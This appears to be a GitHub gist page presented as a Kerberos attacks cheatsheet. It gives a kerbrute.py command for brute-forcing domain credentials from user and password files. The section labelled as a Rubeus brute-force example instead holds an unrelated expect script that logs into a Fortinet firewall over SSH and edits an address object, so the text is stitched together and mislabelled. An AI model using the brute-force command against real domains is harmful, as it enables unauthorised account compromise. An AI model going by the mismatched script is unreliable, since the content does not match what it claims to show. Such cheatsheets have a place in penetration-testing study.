Skip to content

Instantly share code, notes, and snippets.

@kinomakino
kinomakino / kerberos_attacks_cheatsheet.md
Created November 24, 2020 07:59 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

#!/usr/bin/expect -f
set mortadela [lindex $argv 0]
set timeout 60
spawn ssh usuario@ip_fortinet
expect "password:"
send "tu_clave\r"
expect "Terciario"
send "config firewall address\r"
expect "Terciario (address)"
send "edit $mortadela\r"